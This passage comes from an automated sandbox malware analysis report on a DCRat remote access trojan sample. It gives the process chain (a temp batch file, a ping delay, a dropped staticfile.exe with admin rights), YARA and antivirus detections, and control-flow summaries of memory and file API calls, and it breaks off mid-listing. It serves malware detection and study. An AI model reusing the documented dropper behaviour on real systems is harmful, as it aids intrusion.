                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1679174176.0000000000962000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:16:35:31
                                        Start date:30/11/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5hJc6iFcNs.bat"
                                        Imagebase:0x7ff6e14c0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:16:35:31
                                        Start date:30/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:16:35:31
                                        Start date:30/11/2024
                                        Path:C:\Windows\System32\chcp.com
                                        Wow64 process (32bit):false
                                        Commandline:chcp 65001
                                        Imagebase:0x7ff7c2b60000
                                        File size:14'848 bytes
                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:16:35:31
                                        Start date:30/11/2024
                                        Path:C:\Windows\System32\PING.EXE
                                        Wow64 process (32bit):false
                                        Commandline:ping -n 10 localhost
                                        Imagebase:0x7ff7737c0000
                                        File size:22'528 bytes
                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:16:35:41
                                        Start date:30/11/2024
                                        Path:C:\Users\user\AppData\Local\staticfile.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\AppData\Local\staticfile.exe"
                                        Imagebase:0x2d0000
                                        File size:1'657'344 bytes
                                        MD5 hash:8C6E4C86C216B898F24FF14B417C4369
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.4162410596.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.4162410596.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\staticfile.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 66%, ReversingLabs
                                        Reputation:low
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:13.5%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:13.5%
                                          Total number of Nodes:37
                                          Total number of Limit Nodes:3
                                          execution_graph 15069 7ffd9b7fe6da 15075 7ffd9b7fe6eb 15069->15075 15070 7ffd9b7fe815 15077 7ffd9b7fec5a 15070->15077 15072 7ffd9b7fe7db 15073 7ffd9b7fec5a GetSystemInfo 15072->15073 15074 7ffd9b7fe82a 15073->15074 15075->15070 15075->15072 15076 7ffd9b7fe820 15078 7ffd9b7fec65 15077->15078 15079 7ffd9b7fec85 15078->15079 15080 7ffd9b7fed22 GetSystemInfo 15078->15080 15079->15076 15081 7ffd9b7fed85 15080->15081 15081->15076 15036 7ffd9b7ff0f5 15037 7ffd9b7ff161 VirtualAlloc 15036->15037 15039 7ffd9b7ff23f 15037->15039 15040 7ffd9b7fd2f5 15041 7ffd9b7fd36b WriteFile 15040->15041 15043 7ffd9b7fd48f 15041->15043 15065 7ffd9b7fec91 15066 7ffd9b7fec9e GetSystemInfo 15065->15066 15068 7ffd9b7fed85 15066->15068 15044 7ffd9b7fba20 15045 7ffd9b7fba2c 15044->15045 15048 7ffd9b7fb670 15045->15048 15047 7ffd9b7fbac0 15049 7ffd9b7fb679 CreateFileTransactedW 15048->15049 15051 7ffd9b7fd268 15049->15051 15051->15047 15052 7ffd9b7fb57d 15053 7ffd9b8614b0 15052->15053 15056 7ffd9b8607d0 15053->15056 15055 7ffd9b861599 15057 7ffd9b8607db 15056->15057 15059 7ffd9b86087e 15057->15059 15060 7ffd9b860897 15057->15060 15059->15055 15061 7ffd9b8608a2 15060->15061 15062 7ffd9b8608ea ResumeThread 15060->15062 15061->15059 15064 7ffd9b8609b4 15062->15064 15064->15059

                                          Executed Functions

                                          Function 00007FFD9B7FEC5A Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 785 7ffd9b7fec5a-7ffd9b7fec63 786 7ffd9b7fec65-7ffd9b7fec83 785->786 787 7ffd9b7fecad 785->787 791 7ffd9b7fec85-7ffd9b7fec8f 786->791 792 7ffd9b7fec9e-7ffd9b7fecaa 786->792 789 7ffd9b7fecb0-7ffd9b7fed83 GetSystemInfo 787->789 790 7ffd9b7fecaf 787->790 795 7ffd9b7fed8b-7ffd9b7fedbb 789->795 796 7ffd9b7fed85 789->796 790->789 792->787 796->795
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1746692011.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b7f0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID: InfoSystem
                                          • String ID:
                                          • API String ID: 31276548-0
                                          • Opcode ID: 70c6b9368f278722c2de635c312aab6175e971812dfc6e41f0c777e37edbad10
                                          • Instruction ID: c94d486c880e62a015e2215c1cb4ab7eb843cf499beb6195adcc989d9b3a514a
                                          • Opcode Fuzzy Hash: 70c6b9368f278722c2de635c312aab6175e971812dfc6e41f0c777e37edbad10
                                          • Instruction Fuzzy Hash: 3A41A030A08A4C8FDB59DFA8D859AEDBFF0FB59310F0041ABD04DD72A2DA356946CB50
                                          Function 00007FFD9B9E9C70 Relevance: .9, Instructions: 889COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 932 7ffd9b9e9c70-7ffd9b9e9c80 933 7ffd9b9ea2ca-7ffd9b9ea2e0 932->933 934 7ffd9b9e9c86-7ffd9b9e9cc1 932->934 936 7ffd9b9ea32a-7ffd9b9ea34e 933->936 937 7ffd9b9ea2e2-7ffd9b9ea34e 933->937 941 7ffd9b9e9d5a-7ffd9b9e9d62 934->941 939 7ffd9b9ea350-7ffd9b9ea3bc 936->939 937->939 948 7ffd9b9ea406-7ffd9b9ea40b 939->948 949 7ffd9b9ea3be-7ffd9b9ea3f1 939->949 942 7ffd9b9e9d68 941->942 943 7ffd9b9e9cc6-7ffd9b9e9ccf 941->943 946 7ffd9b9e9d72-7ffd9b9e9d8f 942->946 943->933 947 7ffd9b9e9cd5-7ffd9b9e9ce0 943->947 957 7ffd9b9e9d96-7ffd9b9e9da7 946->957 952 7ffd9b9e9d6a-7ffd9b9e9d6e 947->952 953 7ffd9b9e9ce6-7ffd9b9e9cfa 947->953 950 7ffd9b9ea414-7ffd9b9ea491 948->950 951 7ffd9b9ea40d 948->951 954 7ffd9b9ea3fa-7ffd9b9ea405 949->954 955 7ffd9b9ea3f3 949->955 975 7ffd9b9ea499-7ffd9b9ea4a1 call 7ffd9b9e9bb0 950->975 958 7ffd9b9ea411 951->958 952->946 959 7ffd9b9e9cfc-7ffd9b9e9d13 953->959 960 7ffd9b9e9d53-7ffd9b9e9d57 953->960 954->958 961 7ffd9b9ea407-7ffd9b9ea40d 954->961 955->954 969 7ffd9b9e9da9-7ffd9b9e9dbe 957->969 970 7ffd9b9e9dc0-7ffd9b9e9dcf 957->970 958->950 959->933 963 7ffd9b9e9d19-7ffd9b9e9d25 959->963 960->941 961->950 966 7ffd9b9e9d27-7ffd9b9e9d3b 963->966 967 7ffd9b9e9d3f-7ffd9b9e9d50 963->967 966->959 971 7ffd9b9e9d3d 966->971 967->960 969->970 976 7ffd9b9e9df1-7ffd9b9e9e5e 970->976 977 7ffd9b9e9dd1-7ffd9b9e9dec 970->977 971->960 990 7ffd9b9e9eaf-7ffd9b9e9ef6 976->990 991 7ffd9b9e9e60-7ffd9b9e9e73 976->991 987 7ffd9b9ea229-7ffd9b9ea249 977->987 994 7ffd9b9ea24d-7ffd9b9ea25a 987->994 1002 7ffd9b9e9efa-7ffd9b9e9f1b 990->1002 991->933 993 7ffd9b9e9e79-7ffd9b9e9ea7 991->993 1003 7ffd9b9e9ea8-7ffd9b9e9ead 993->1003 996 7ffd9b9ea25c-7ffd9b9ea266 994->996 996->932 998 7ffd9b9ea26b-7ffd9b9ea27a 996->998 1000 7ffd9b9ea27c-7ffd9b9ea27e 998->1000 1001 7ffd9b9ea281-7ffd9b9ea295 998->1001 1000->1001 1007 7ffd9b9e9f8c-7ffd9b9e9f9d 1002->1007 1008 7ffd9b9e9f1d-7ffd9b9e9f21 1002->1008 1003->991 1004 7ffd9b9e9eae 1003->1004 1004->990 1009 7ffd9b9e9f9e-7ffd9b9e9fa1 1007->1009 1008->1003 1011 7ffd9b9e9f23 1008->1011 1013 7ffd9b9e9fa7-7ffd9b9e9fab 1009->1013 1012 7ffd9b9e9f4c-7ffd9b9e9f5d 1011->1012 1012->1013 1018 7ffd9b9e9f5f-7ffd9b9e9f6d 1012->1018 1014 7ffd9b9e9fad-7ffd9b9e9faf 1013->1014 1016 7ffd9b9e9ff9-7ffd9b9ea001 1014->1016 1017 7ffd9b9e9fb1-7ffd9b9e9fbf 1014->1017 1019 7ffd9b9ea04b-7ffd9b9ea053 1016->1019 1020 7ffd9b9ea003-7ffd9b9ea00c 1016->1020 1021 7ffd9b9e9fc1-7ffd9b9e9fc5 1017->1021 1022 7ffd9b9ea030-7ffd9b9ea045 1017->1022 1023 7ffd9b9e9f6f-7ffd9b9e9f73 1018->1023 1024 7ffd9b9e9fde-7ffd9b9e9ff3 1018->1024 1027 7ffd9b9ea0db-7ffd9b9ea0e9 1019->1027 1028 7ffd9b9ea059-7ffd9b9ea072 1019->1028 1025 7ffd9b9ea00f-7ffd9b9ea011 1020->1025 1021->1012 1035 7ffd9b9e9fc7 1021->1035 1022->1019 1023->1002 1041 7ffd9b9e9f75 1023->1041 1024->1016 1033 7ffd9b9ea013-7ffd9b9ea015 1025->1033 1034 7ffd9b9ea082-7ffd9b9ea084 1025->1034 1030 7ffd9b9ea0eb-7ffd9b9ea0ed 1027->1030 1031 7ffd9b9ea15a-7ffd9b9ea15b 1027->1031 1028->1027 1029 7ffd9b9ea074-7ffd9b9ea075 1028->1029 1036 7ffd9b9ea076-7ffd9b9ea081 1029->1036 1038 7ffd9b9ea169-7ffd9b9ea16b 1030->1038 1039 7ffd9b9ea0ef 1030->1039 1037 7ffd9b9ea18b-7ffd9b9ea18d 1031->1037 1042 7ffd9b9ea017 1033->1042 1043 7ffd9b9ea091-7ffd9b9ea095 1033->1043 1047 7ffd9b9ea085-7ffd9b9ea087 1034->1047 1035->1024 1036->1034 1062 7ffd9b9ea0fd 1036->1062 1051 7ffd9b9ea18f 1037->1051 1052 7ffd9b9ea1fe-7ffd9b9ea227 1037->1052 1044 7ffd9b9ea1dc 1038->1044 1045 7ffd9b9ea16d-7ffd9b9ea16f 1038->1045 1039->1036 1046 7ffd9b9ea0f1 1039->1046 1041->1007 1042->1009 1048 7ffd9b9ea019 1042->1048 1049 7ffd9b9ea097 1043->1049 1050 7ffd9b9ea111-7ffd9b9ea12b 1043->1050 1044->994 1054 7ffd9b9ea1de-7ffd9b9ea1e0 1044->1054 1055 7ffd9b9ea1eb-7ffd9b9ea1ef 1045->1055 1056 7ffd9b9ea171 1045->1056 1057 7ffd9b9ea0f8-7ffd9b9ea0fc 1046->1057 1067 7ffd9b9ea108-7ffd9b9ea110 1047->1067 1068 7ffd9b9ea088 1047->1068 1059 7ffd9b9ea01e-7ffd9b9ea024 1048->1059 1049->1059 1060 7ffd9b9ea099 1049->1060 1082 7ffd9b9ea15d-7ffd9b9ea166 1050->1082 1083 7ffd9b9ea12d-7ffd9b9ea13b 1050->1083 1061 7ffd9b9ea1ac-7ffd9b9ea1ba 1051->1061 1052->987 1054->996 1063 7ffd9b9ea1e2 1054->1063 1055->998 1066 7ffd9b9ea1f1 1055->1066 1056->1057 1064 7ffd9b9ea173 1056->1064 1057->1062 1065 7ffd9b9ea178-7ffd9b9ea17c 1057->1065 1071 7ffd9b9ea0a0-7ffd9b9ea0c5 1059->1071 1081 7ffd9b9ea026 1059->1081 1060->1071 1073 7ffd9b9ea1bb-7ffd9b9ea1c5 1061->1073 1076 7ffd9b9ea17e 1062->1076 1077 7ffd9b9ea0fe 1062->1077 1063->1038 1075 7ffd9b9ea1e4 1063->1075 1064->1065 1065->1076 1066->1065 1079 7ffd9b9ea1f3 1066->1079 1067->1050 1068->1025 1080 7ffd9b9ea089-7ffd9b9ea08a 1068->1080 1091 7ffd9b9ea0c8-7ffd9b9ea0d9 1071->1091 1074 7ffd9b9ea1c7-7ffd9b9ea1da 1073->1074 1074->1044 1075->1055 1085 7ffd9b9ea1fa-7ffd9b9ea1fd 1076->1085 1086 7ffd9b9ea180 1076->1086 1077->1047 1084 7ffd9b9ea0ff-7ffd9b9ea100 1077->1084 1079->1085 1080->1043 1081->1014 1087 7ffd9b9ea028 1081->1087 1082->1038 1083->1061 1088 7ffd9b9ea13d-7ffd9b9ea13f 1083->1088 1084->1067 1085->1052 1086->1074 1093 7ffd9b9ea182-7ffd9b9ea18a 1086->1093 1087->1022 1088->1073 1094 7ffd9b9ea141 1088->1094 1091->1027 1091->1029 1093->1037 1094->1091 1095 7ffd9b9ea143 1094->1095 1095->1031
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2debeb3f30aea096c4bde6e0cb7d830032abbda72683e4e98f3d091149049cf1
                                          • Instruction ID: 61204611b12428294728f8cc14fb33fea9c4ea876dcfabf6396508efed792889
                                          • Opcode Fuzzy Hash: 2debeb3f30aea096c4bde6e0cb7d830032abbda72683e4e98f3d091149049cf1
                                          • Instruction Fuzzy Hash: 8C522730A1D64D9FD768DB58C869AB877E1FF46310F1141B9E04EC72B2DA35AE42CB81
                                          Function 00007FFD9B803415 Relevance: .7, Instructions: 702COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1746692011.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b7f0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7d9fe8ebbee9123123ea2f79ec3e0c352adec3220aa5f0b690bf357638ce5984
                                          • Instruction ID: 9d0bafbabca155713d64b302684a5d0c2cfd35b6a2bfd8041fd1f5763224611c
                                          • Opcode Fuzzy Hash: 7d9fe8ebbee9123123ea2f79ec3e0c352adec3220aa5f0b690bf357638ce5984
                                          • Instruction Fuzzy Hash: F1523970A0961D8FDB68DF94C4A4AF977B2FF58304F5041ADD04EA7292CB79AA46CF40
                                          Function 00007FFD9B7FD04A Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 682 7ffd9b7fd04a-7ffd9b7fd057 683 7ffd9b7fd059-7ffd9b7fd061 682->683 684 7ffd9b7fd062-7ffd9b7fd128 682->684 683->684 688 7ffd9b7fd12a-7ffd9b7fd141 684->688 689 7ffd9b7fd144-7ffd9b7fd266 CreateFileTransactedW 684->689 688->689 690 7ffd9b7fd268 689->690 691 7ffd9b7fd26e-7ffd9b7fd2f0 689->691 690->691
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1746692011.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b7f0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID: CreateFileTransacted
                                          • String ID:
                                          • API String ID: 2149338676-0
                                          • Opcode ID: 3169cd271fbb9786086b69e7303629e6e44c037f5fa476388e5209277c73fa0d
                                          • Instruction ID: b370b2f8fc04e79b8860ef13def88ee794bd2a40ac371208d4c5980b1a185758
                                          • Opcode Fuzzy Hash: 3169cd271fbb9786086b69e7303629e6e44c037f5fa476388e5209277c73fa0d
                                          • Instruction Fuzzy Hash: 50913770908A5C8FDB99DF58C894BE9BBF1FB6A310F1041AED04DE3291DB75A980CB44
                                          Function 00007FFD9B7FB670 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 694 7ffd9b7fb670-7ffd9b7fd128 699 7ffd9b7fd12a-7ffd9b7fd141 694->699 700 7ffd9b7fd144-7ffd9b7fd266 CreateFileTransactedW 694->700 699->700 701 7ffd9b7fd268 700->701 702 7ffd9b7fd26e-7ffd9b7fd2f0 700->702 701->702
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1746692011.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b7f0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ac825a766a1b6603529f263cd6e59a46e5457e9a10a1c9ad637ae132b9abcb9
                                          • Instruction ID: 6c76e71e8a776a31f690cf76a6b6cb640313c4c97c77285118c5e0ac1c7f256b
                                          • Opcode Fuzzy Hash: 7ac825a766a1b6603529f263cd6e59a46e5457e9a10a1c9ad637ae132b9abcb9
                                          • Instruction Fuzzy Hash: 5781B170A08A1D8FDB98DF58C895BA9BBF1FB69301F1051AED04EE3251DB71A981CB44
                                          Function 00007FFD9B7FD2F5 Relevance: 1.7, APIs: 1, Instructions: 215fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 705 7ffd9b7fd2f5-7ffd9b7fd3c2 708 7ffd9b7fd3ea-7ffd9b7fd48d WriteFile 705->708 709 7ffd9b7fd3c4-7ffd9b7fd3e7 705->709 710 7ffd9b7fd495-7ffd9b7fd4f1 708->710 711 7ffd9b7fd48f 708->711 709->708 711->710
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1746692011.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b7f0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: a29d6b2bf398eb59fc50d7f8919d8c9db827cb68a99ead62b394c7266ae8f8dc
                                          • Instruction ID: 31028e991cd22f0b8433cde5ad6501d60a7a802c961c693499e96fd7632ffc7c
                                          • Opcode Fuzzy Hash: a29d6b2bf398eb59fc50d7f8919d8c9db827cb68a99ead62b394c7266ae8f8dc
                                          • Instruction Fuzzy Hash: A4611370A08A5C8FDB98DF58C895BE9BBF1FB69310F1041AED04DE3291DB74A985CB40
                                          Function 00007FFD9B9E7976 Relevance: 1.7, Strings: 1, Instructions: 450COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 713 7ffd9b9e7976-7ffd9b9e797c 714 7ffd9b9e7986-7ffd9b9e79a4 713->714 715 7ffd9b9e797e-7ffd9b9e7984 713->715 717 7ffd9b9e79a6-7ffd9b9e79b7 714->717 718 7ffd9b9e79b8-7ffd9b9e79e5 714->718 715->714 717->718 721 7ffd9b9e7c9c-7ffd9b9e7d0e 718->721 722 7ffd9b9e79eb-7ffd9b9e79f6 718->722 749 7ffd9b9e7d2b-7ffd9b9e7d3c 721->749 750 7ffd9b9e7d10-7ffd9b9e7d16 721->750 723 7ffd9b9e79fc-7ffd9b9e7a0a 722->723 724 7ffd9b9e7ab4-7ffd9b9e7ab9 722->724 723->721 727 7ffd9b9e7a10-7ffd9b9e7a21 723->727 725 7ffd9b9e7b4d-7ffd9b9e7b57 724->725 726 7ffd9b9e7abf-7ffd9b9e7ac9 724->726 730 7ffd9b9e7b79-7ffd9b9e7b80 725->730 731 7ffd9b9e7b59-7ffd9b9e7b64 725->731 726->721 729 7ffd9b9e7acf-7ffd9b9e7ae3 726->729 732 7ffd9b9e7a89-7ffd9b9e7aa0 727->732 733 7ffd9b9e7a23-7ffd9b9e7a46 727->733 735 7ffd9b9e7b83-7ffd9b9e7b8d 729->735 730->735 746 7ffd9b9e7b6b-7ffd9b9e7b77 731->746 732->721 738 7ffd9b9e7aa6-7ffd9b9e7aae 732->738 736 7ffd9b9e7a4c-7ffd9b9e7a5f 733->736 737 7ffd9b9e7ae8-7ffd9b9e7aed 733->737 735->721 741 7ffd9b9e7b93-7ffd9b9e7bab 735->741 739 7ffd9b9e7a63-7ffd9b9e7a87 736->739 737->739 738->723 738->724 739->732 753 7ffd9b9e7af2-7ffd9b9e7af5 739->753 741->721 744 7ffd9b9e7bb1-7ffd9b9e7bc9 741->744 744->721 747 7ffd9b9e7bcf-7ffd9b9e7c03 744->747 746->730 747->721 774 7ffd9b9e7c09-7ffd9b9e7c1c 747->774 751 7ffd9b9e7d3e-7ffd9b9e7d4c 749->751 752 7ffd9b9e7d4d-7ffd9b9e7d70 749->752 754 7ffd9b9e7d18-7ffd9b9e7d29 750->754 755 7ffd9b9e7d71-7ffd9b9e7d8e 750->755 751->752 757 7ffd9b9e7b0b-7ffd9b9e7b18 753->757 758 7ffd9b9e7af7-7ffd9b9e7b07 753->758 754->749 754->750 757->721 761 7ffd9b9e7b1e-7ffd9b9e7b4c 757->761 758->757 775 7ffd9b9e7c1e-7ffd9b9e7c29 774->775 776 7ffd9b9e7c7f-7ffd9b9e7c90 774->776 775->776 778 7ffd9b9e7c2b-7ffd9b9e7c42 775->778 780 7ffd9b9e7c44-7ffd9b9e7c4f 778->780 781 7ffd9b9e7c53-7ffd9b9e7c75 778->781 780->781 781->776
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: c73a655e943ec8ddf3a8b6896c8e8270b9ce2ca905585bfc1ad0678e78e9e15f
                                          • Instruction ID: 92aa699c04275f19a4b9566083ab703f80203d00975a28beb92f1e36830acc18
                                          • Opcode Fuzzy Hash: c73a655e943ec8ddf3a8b6896c8e8270b9ce2ca905585bfc1ad0678e78e9e15f
                                          • Instruction Fuzzy Hash: C6E14230B28A0A4FD758DF28C495975B3E1FF95304B1445B9D44ACB2ABDA38F943C782
                                          Function 00007FFD9B860897 Relevance: 1.7, APIs: 1, Instructions: 151threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 799 7ffd9b860897-7ffd9b8608a0 800 7ffd9b8608a2-7ffd9b8608c2 799->800 801 7ffd9b8608ea-7ffd9b8609b2 ResumeThread 799->801 806 7ffd9b8609b4 801->806 807 7ffd9b8609ba-7ffd9b860a04 801->807 806->807
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1746692011.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b7f0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 8a65d7a6ef32c4acfe5fb2bd40fffa5f0b096bf25fc2c799ffb6c16f95524b56
                                          • Instruction ID: fe88a21ce107d23986d9d680402dbc802a8bb5539b5e84834034eee26c9dc304
                                          • Opcode Fuzzy Hash: 8a65d7a6ef32c4acfe5fb2bd40fffa5f0b096bf25fc2c799ffb6c16f95524b56
                                          • Instruction Fuzzy Hash: 08413970E08A0C8FDB58EFA8D895AEDBBF0FB59310F10416AD44DE7252DA75A946CB40
                                          Function 00007FFD9B7FEC91 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 810 7ffd9b7fec91-7ffd9b7fecad 813 7ffd9b7fecb0-7ffd9b7fed83 GetSystemInfo 810->813 814 7ffd9b7fecaf 810->814 817 7ffd9b7fed8b-7ffd9b7fedbb 813->817 818 7ffd9b7fed85 813->818 814->813 818->817
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1746692011.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b7f0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID: InfoSystem
                                          • String ID:
                                          • API String ID: 31276548-0
                                          • Opcode ID: 42be9d9a4fa14edd63e30a1720481697a0738beba78ad8cc3eb1cc5fa6a1fbda
                                          • Instruction ID: 3b840fddaefda5f958ea9486f94518da2880547cb780d7ef57514de6368224bf
                                          • Opcode Fuzzy Hash: 42be9d9a4fa14edd63e30a1720481697a0738beba78ad8cc3eb1cc5fa6a1fbda
                                          • Instruction Fuzzy Hash: E241A07090868C8FDB59DFA8D859BE9BFF0EF5A310F0441AAD04DD72A2CA356846CB50
                                          Function 00007FFD9B7FF0F5 Relevance: 1.4, APIs: 1, Instructions: 193memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 854 7ffd9b7ff0f5-7ffd9b7ff23d VirtualAlloc 857 7ffd9b7ff245-7ffd9b7ff2a9 854->857 858 7ffd9b7ff23f 854->858 858->857
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1746692011.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b7f0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 80dfd0e4f4f2047e3a894894f094681168169f854ae9cafe602ba98e864904fd
                                          • Instruction ID: ef7cecb3632e734c0c332d1b9302e13df882ce54a5cecac09134da50d6cbc53a
                                          • Opcode Fuzzy Hash: 80dfd0e4f4f2047e3a894894f094681168169f854ae9cafe602ba98e864904fd
                                          • Instruction Fuzzy Hash: BC512A74918A5C8FDF58DF58C855BE9BBF0FB6A310F1042AAD04DE3251DB71A981CB41
                                          Function 00007FFD9B9EBCC8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: eed7a03465bab83de8c7bc75926887ddf53142b9ab7e8f7cca820032b1ccfd93
                                          • Instruction ID: 9a94b6d977e706221fe37f5ef80d7de844dd03d195ea25045158acbacedfa286
                                          • Opcode Fuzzy Hash: eed7a03465bab83de8c7bc75926887ddf53142b9ab7e8f7cca820032b1ccfd93
                                          • Instruction Fuzzy Hash: 4B515E71E1954E9FDB69DB98D4A55BCBBB1FF58300F1140BEC01AD72A6DE382A01CB50
                                          Function 00007FFD9B9E5828 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
